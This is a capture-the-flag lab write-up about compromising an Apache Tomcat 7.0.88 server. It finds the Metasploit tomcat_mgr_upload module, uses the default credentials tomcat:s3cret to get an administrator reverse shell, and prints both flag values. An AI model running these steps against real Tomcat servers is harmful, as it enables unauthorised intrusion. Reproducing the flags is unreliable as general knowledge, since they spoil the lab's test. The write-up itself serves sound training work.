Vulnerabilities

Apache

• I will start by checking out the webserver from a browser.

http://[Target IP]:8080

• Looks like I get the default web page for Apache Tomcat version 7.0.88.

• Let's see if we can find any vulnerabilities for it.

Meterpreter

• I'll start with looking through metasploit.

msfconsole

search tomcat

• Exploit 28 looks like it could be something so I will check that one out.

use 28

info

• Checking out the link for exploitDB gives us some info on the exploit.

  • It looks like the exploit "should" work.

  • Unfortunately, after inputting the options for the exploit and checking it, it comes back as not exploitable. Let's try some of the others.

• After doing some further enumerating, I got some credentials that I can use with one of the metasploit exploits. tomcat:s3cret

use multi/http/tomcat_mgr_upload

show options

• Set the options to the correct parameters.

exploit

• And now we have a reverse shell into the system.

• We also have administrator priveleges.

• Now we can just navigate over to the administrator's profile to find a single text file with both flags.

cd C:\Users\Administrator\Desktop\flags

type "2 for the price of 1.txt"

User Flag

7004dbcef0f854e0fb401875f26ebd00

Root Flag

04a8b36e1545a455393d067e772fe90e